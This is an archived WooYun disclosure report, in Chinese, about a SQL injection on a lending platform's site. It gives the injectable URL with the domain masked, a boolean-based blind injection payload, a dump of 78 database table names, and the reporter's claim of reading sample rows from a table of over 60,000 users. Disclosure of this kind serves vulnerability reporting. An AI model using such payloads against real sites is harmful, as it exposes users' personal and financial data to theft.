乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-17: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-10-01: 厂商已经主动忽略漏洞,细节向公众公开
test
融贝网https://**.**.**.**/主站存在sql注入漏洞通过注入漏洞,可以获取6万多用户信息。
注入点:https://**.**.**.**/index/plist?type=0&status=0&income=0&condition=close&payment=0&cycle=0
Parameter: type (GET) Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - Parameter replace Payload: type=(SELECT (CASE WHEN (5430=5430) THEN 5430 ELSE 5430*(SELECT 5430 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&status=0&income=0&condition=close&payment=0&cycle=0
通过注入跑出了dbs
当前库是vvt
vvt库中有78个表
[78 tables]+---------------------------+| vvt_admin_funcs || vvt_admin_role_funcs || vvt_admin_roles || vvt_admin_user || vvt_areas || vvt_assign || vvt_assign_audit || vvt_bankinfo || vvt_banks || vvt_banks_branch || vvt_banner || vvt_cautioner || vvt_cautioner_property || vvt_charge || vvt_charge_company || vvt_check_user_account || vvt_checkmobile || vvt_chinapnr_bankinfo || vvt_cms_category || vvt_company || vvt_company_loan || vvt_company_property || vvt_crontab || vvt_csai_push || vvt_discharge || vvt_discharge_company || vvt_flink_partner || vvt_illegalusername || vvt_income || vvt_invest || vvt_invitation || vvt_invite_reward || vvt_log || vvt_message || vvt_messagesend || vvt_move_statistics || vvt_newcms || vvt_payment || vvt_payment_copy || vvt_personal_approveinfo || vvt_personal_property || vvt_petition || vvt_platform || vvt_project || vvt_project_copy || vvt_project_othergain || vvt_project_pregain || vvt_project_property || vvt_project_schedule || vvt_project_schedule_copy || vvt_promote_summary || vvt_property || vvt_question || vvt_repayment || vvt_repayment_copy || vvt_reviewsinfo || vvt_role || vvt_spread_award || vvt_spread_duanwu || vvt_spread_times || vvt_survey_options || vvt_survey_questions || vvt_sys_company_pay || vvt_sys_profit || vvt_user || vvt_user_cash || vvt_user_gain || vvt_user_gain_copy || vvt_user_log || vvt_user_money_log || vvt_user_property || vvt_user_property_copy || vvt_user_rebate || vvt_user_repayment || vvt_user_reward || vvt_user_service_log || vvt_user_suggestion || vvt_user_survey_log |+---------------------------+
跑了一下vvt_user表,表中有6万多用户数据
跑的速度有点慢,跑了几行验证一下
做好过滤
危害等级:暂时无回应
漏洞Rank:0
确认时间:2015-08-17 22:00
暂无